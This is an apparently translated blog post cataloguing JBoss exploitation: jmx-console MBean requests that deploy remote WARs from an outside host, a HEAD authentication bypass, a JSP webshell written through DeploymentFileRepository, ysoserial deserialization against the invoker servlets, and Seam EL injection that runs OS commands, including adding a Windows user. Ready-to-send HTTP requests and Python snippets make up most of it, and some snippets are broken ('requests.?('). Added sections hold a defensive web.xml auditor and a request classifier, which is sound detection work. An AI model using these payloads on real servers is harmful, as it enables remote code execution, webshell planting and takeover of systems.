2020-07-09 | JAVA | UNLOCK

JBoss Vulnerability Summary

Summary

  • jmx-console (HtmlAdaptor)
    DeploymentScanner
    MainDeployer
    DeploymentFileRepository
    BSHDeployer

  • web-console
    Invoker

  • Deserialize
    readonly
    JMXInvokerServlet
    EJBInvokerServlet

  • seam2
    *.seam

jmx-console

[!] Every module of the jmx-console unauthenticated-access vulnerability can be driven in two parameter-passing modes and three request modes.

[!] Parameter-passing modes (method name / method index)

There is no real difference between them.

  • 1. methodName
    &methodName={string(name)}&argType=java.lang.String&arg0={arg0}&argType=java.lang.String&arg1={arg1}...//&argType=java.lang.String&arg{x}={arg}
    With methodName the parameter types must be supplied, and the type is not always String.
    For example, the fourth parameter passed to DeploymentFileRepository is a boolean: its value is true and the parameter name is signxxx.

  • 2. methodIndex
    &methodIndex={int(index)}&arg0={arg0}&arg1={arg1}...&arg{x}={argx}
    With methodIndex no parameter types are needed; just pass the parameter values.

[!] Request modes

  • GET
  • POST
  • HEAD

HEAD deserves a mention.
Reportedly CVE-2010-0738, the JMX console authentication bypass, lets a HEAD request bypass jmx-console authentication.

Combining the 2 parameter-passing modes with the 3 request modes gives 6 request variants per module.
Example using methodIndex parameters; if you prefer, capture the request and build the methodName form instead.

```http
GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%3Aservice%3DMainDeployer&methodIndex=2&arg0=http%3A%2F%2F192.168.43.73%2Fspy2.war HTTP/1.1

HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%3Aservice%3DMainDeployer&methodIndex=2&arg0=http%3A%2F%2F192.168.43.73%2Fspy2.war HTTP/1.1

POST /jmx-console/HtmlAdaptor HTTP/1.1

action=invokeOp&name=jboss.system%3Aservice%3DMainDeployer&methodIndex=2&arg0=http%3A%2F%2F192.168.43.73%2Fspy2.war
```
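
The HEAD bypass works because the jmx-console web.xml of affected versions protected HtmlAdaptor with a security-constraint that listed only GET and POST, so any other verb fell outside it. The following Python is added here and is not part of the original post: it audits a web.xml for that pattern and produces the corrected form. The web.xml fragment is a constructed sample modelled on the affected configuration, and the function names are mine.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the jmx-console web.xml affected by CVE-2010-0738:
# the constraint lists only GET and POST, so HEAD (or any other verb) falls
# outside it and HtmlAdaptor answers without authentication.
WEAK_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""

def _local(tag: str) -> str:
    """Drop an XML namespace prefix so real web.xml files (which carry xmlns) match."""
    return tag.rsplit("}", 1)[-1]

def find_verb_gaps(web_xml: str) -> list:
    """Return (url-pattern, listed methods) for each authenticated collection that
    enumerates HTTP methods and therefore leaves unlisted verbs unprotected."""
    root = ET.fromstring(web_xml)
    gaps = []
    for sc in (e for e in root.iter() if _local(e.tag) == "security-constraint"):
        if not any(_local(e.tag) == "auth-constraint" for e in sc):
            continue  # nothing to bypass: this constraint does not require auth
        for wrc in (e for e in sc if _local(e.tag) == "web-resource-collection"):
            methods = [e.text.strip() for e in wrc if _local(e.tag) == "http-method"]
            patterns = [e.text.strip() for e in wrc if _local(e.tag) == "url-pattern"]
            if methods:
                gaps.extend((p, methods) for p in patterns)
    return gaps

def harden(web_xml: str) -> str:
    """Remove every <http-method> so each constraint applies to all verbs
    (the commonly recommended mitigation for CVE-2010-0738)."""
    root = ET.fromstring(web_xml)
    for wrc in (e for e in root.iter() if _local(e.tag) == "web-resource-collection"):
        for m in [e for e in wrc if _local(e.tag) == "http-method"]:
            wrc.remove(m)
    return ET.tostring(root, encoding="unicode")

if __name__ == "__main__":
    for pattern, methods in find_verb_gaps(WEAK_WEB_XML):
        print(f"{pattern}: only {methods} require auth; other verbs (e.g. HEAD) bypass")
    print("after hardening:", find_verb_gaps(harden(WEAK_WEB_XML)))
```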

[+] Exploitation

  • jboss.deployment:type=DeploymentScanner
    DeploymentScanner (jmx-console unauthenticated WAR deployment): remote WAR, scanned periodically

```http
POST /jmx-console/HtmlAdaptor HTTP/1.1

action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=7&arg0=http%3A%2F%2F192.168.43.73%2Fspy1.war
```

```python
import requests

requests.?(target,data="action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=7&arg0=http%3A%2F%2F192.168.43.73%2Fspy1.war")
```
  • jboss.system:service=MainDeployer
    MainDeployer (jmx-console unauthenticated WAR deployment): remote WAR

```http
POST /jmx-console/HtmlAdaptor HTTP/1.1

action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://192.168.43.73/spy7.war
```

```python
import requests

requests.?(target,data="action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://192.168.43.73/spy7.war")
```

Not much different from the one above: jboss.deployment becomes jboss.system and DeploymentScanner becomes MainDeployer; both are remote WAR deployment.
DeploymentScanner periodically scans the remote WAR and syncs it to a local WAR.

  • jboss.system:service=DeploymentFileRepository
    DeploymentFileRepository (jmx-console unauthenticated WAR deployment): parameters passed by name

```http
POST /jmx-console/HtmlAdaptor HTTP/1.1

action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=s.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%25+if(request.getParameter("f")!%3dnull)(new+java.io.FileOutputStream(application.getRealPath("%2f")%2brequest.getParameter("f"))).write(request.getParameter("t").getBytes())%3b+%25>&argType=boolean&arg4=True
```

5 parameters: 1 directory name, 2 shell name, 3 file extension, 4 file content, 5 login verification

```python
import requests

requests.?(target,data="action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=s.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%25+if(request.getParameter("f")!%3dnull)(new+java.io.FileOutputStream(application.getRealPath("%2f")%2brequest.getParameter("f"))).write(request.getParameter("t").getBytes())%3b+%25>&argType=boolean&arg4=True")
```

  • jboss.system:service=BSHDeployer
    BSHDeployer (jmx-console unauthenticated WAR deployment): BeanShell + Base64

```http
POST /jmx-console/HtmlAdaptor HTTP/1.1

action=invokeOp&name=jboss.deployer%3Aservice%3DBSHDeployer&methodIndex=5&arg0=import+java.io.FileOutputStream%3B+import+sun.misc.BASE64Decoder%3B+String+val+%3D+%22YXNkYXNkYXNk%22%3B+BASE64Decoder+decoder+%3D+new+BASE64Decoder%28%29%3B+String+jboss_home+%3D+System.getProperty%28%22jboss.server.home.dir%22%29%3B+new+File%28jboss_home+%2B+%22%2Fdeploy%2F%22%29.mkdir%28%29%3B+byte%5B%5D+byteval+%3D+decoder.decodeBuffer%28val%29%3B+String+location+%3D+jboss_home+%2B+%22%2Fdeploy%2Fabcdefg.war%22%3B+FileOutputStream+fstream+%3D+new+FileOutputStream%28location%29%3B+fstream.write%28byteval%29%3B+fstream.close%28%29%3B&arg1=cnahcklna.bsh
```

2 parameters; arg0 is the BeanShell content, which unpacks itself.
Within it:
the Base64 between %22YXNkYXNkYXNk%22 must be replaced with the Base64 of the zipped WAR;
%2Fabcdefg.war%22 is the WAR name and can be changed to your own.

web-console

  • web-console/Invoker

Quoting A牛:
This Invoker is really the JMX Invoker, and is not limited to the functions provided by the web console.
By default access is unrestricted, so an attacker can use it to send arbitrary JMX commands to the JBoss server.

Looking at the serialized data, it relates to JBoss RMI:
RemoteMBeanInvocation => … => MainDeployer

https://github.com/joaomatosf/jexboss/blob/master/_exploits.py
Line 417: def exploit_web_console_invoker(url):

  • Exploitation:

POST the data below directly to the target's web-console/Invoker.

[!] Note the request header

Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation
This results in /jexws4/jexws4.jsp?ppp=whoami

```http
POST /web-console/Invoker HTTP/1.1
Content-Type :application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation

data=data
```

data (https://github.com/joaomatosf/jexboss/blob/master/_exploits.py)
exploit_web_console_invoker(url): …


invoker (deserialization)

  • /invoker/JMXInvokerServlet

    Exploitation

Just send a ysoserial payload to this path.
CommonsCollections1/3/6
Content-Type should not matter; if you like, change it to
Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation

```http
POST //invoker/JMXInvokerServlet HTTP/1.1

data=CommonsCollections1/3/6
```

  • /invoker/EJBInvokerServlet

    Exploitation

Just send a ysoserial payload to this path.
CommonsCollections1/3/6
Content-Type should not matter; if you like, change it to
Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation

```http
POST //invoker/EJBInvokerServlet HTTP/1.1

data=CommonsCollections1/3/6
```

  • /invoker/readonly

    Exploitation

Just send a ysoserial payload to this path.
CommonsCollections1/3/6
Content-Type should not matter; if you like, change it to
Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation

```http
POST //invoker/readonly HTTP/1.1

data=CommonsCollections1/3/6
```

  • invoker/JNDIFactory

[!] Exploitation method unknown

Not sure how to attack it; it should be exploitable.

  • /jbossmq-httpil/HTTPServerILServlet

Disabled by default; skip.

seam2

  • /admin-console/login.seam

Supports GET/POST/HEAD

seamframework <= 2.2
JBoss EL

  • Introduction:

http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html

  • Description:

To execute arbitrary OS commands, an attacker needs to find, in the array returned by getDeclaredMethods(), the indices of the following 2 methods of the java.lang.Runtime class:
1) public java.lang.Process java.lang.Runtime.exec(java.lang.String) throws java.io.IOException
2) public static java.lang.Runtime java.lang.Runtime.getRuntime()

  • Exploitation

Find the two errors by indexing into .getDeclaredMethods().
The response code is 302, and the two exceptions appear in Response.Headers.Location:
public+static+java.lang.Runtime+java.lang.Runtime.getRuntime
public+java.lang.Process+java.lang.Runtime.exec%28java.lang.String%2Cjava.lang.String%5B%5D%29+throws+java.io.IOException
1. Find the index (not done here)

```http
POST /admin-console/login.seam

actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6]}
// to complete exploitation the request below must be constructed
```

  1. Reflection, direct attack

```http
POST /admin-console/login.seam

actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('calc')}
// code execution
...
actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('net user test qwe123.. /add')}
```
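
As an added defensive example (not part of the original post), the following Python classifies captured requests against the patterns catalogued above: HtmlAdaptor invocations of the deployer MBeans over any verb (including the HEAD variant), POSTs to the invoker deserialization endpoints, and Seam actionOutcome values carrying EL. The sample requests are constructed, and the labels and function names are mine.

```python
from typing import Optional
from urllib.parse import parse_qs

# MBeans the post shows being invoked through HtmlAdaptor to deploy a WAR.
DEPLOYER_MBEANS = ("DeploymentScanner", "MainDeployer",
                   "DeploymentFileRepository", "BSHDeployer")
# Endpoints that read a serialized Java object straight off the request body.
DESERIALIZATION_PATHS = ("/invoker/JMXInvokerServlet", "/invoker/EJBInvokerServlet",
                         "/invoker/readonly", "/web-console/Invoker")

def classify(method: str, target: str, body: str = "") -> Optional[str]:
    """Label one request with the pattern it matches, or None if it looks benign.
    `target` is the raw request-target (path plus query); `body` is a form body."""
    path, _, query = target.partition("?")
    path = "/" + path.lstrip("/")  # the post's invoker payloads use '//invoker/...'
    params = parse_qs(query)
    params.update(parse_qs(body))   # parse_qs already percent-decodes the values
    if path.endswith("/jmx-console/HtmlAdaptor"):
        action = params.get("action", [""])[0]
        name = params.get("name", [""])[0]
        if action.startswith("invokeOp") and any(m in name for m in DEPLOYER_MBEANS):
            return f"jmx-console deployer invocation via {method}: {name}"
        if method == "HEAD":
            return "HEAD request to jmx-console (CVE-2010-0738 bypass pattern)"
    if method == "POST" and any(path.startswith(p) for p in DESERIALIZATION_PATHS):
        return f"POST to invoker endpoint {path} (Java deserialization sink)"
    if path.endswith("/admin-console/login.seam"):
        if "#{" in params.get("actionOutcome", [""])[0]:
            return "Seam actionOutcome carrying EL (CVE-2010-1871 pattern)"
    return None

# Constructed sample requests shaped like the ones in the post (not real traffic).
SAMPLE = [
    ("HEAD", "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%3Aservice%3DMainDeployer&methodIndex=2&arg0=http%3A%2F%2Fexample.invalid%2Fx.war", ""),
    ("POST", "/jmx-console/HtmlAdaptor", "action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store"),
    ("POST", "//invoker/JMXInvokerServlet", ""),
    ("POST", "/admin-console/login.seam", "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass()}"),
    ("GET", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss%3Aservice%3DNaming", ""),
]

def triage(reqs) -> list:
    """Return (index, label) for every request that matches a pattern."""
    return [(i, lbl) for i, (m, t, b) in enumerate(reqs) if (lbl := classify(m, t, b))]

if __name__ == "__main__":
    for i, lbl in triage(SAMPLE):
        print(f"[{i}] {lbl}")
```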

twiddle

JBoss ships with twiddle, which calls into Java; unauthenticated remote deployment can also be achieved with it.
Ports 4444, 1098, 1099.
Usable as a last resort; reference:
https://www.cnblogs.com/firstdream/p/5977237.html

References

https://github.com/joaomatosf/jexboss/
https://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf
https://wooyun.js.org/drops/JBoss%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98%E6%80%BB%E7%BB%93.html (translation)
https://www.redteam-pentesting.de/files/redteam-jboss.tar.gz
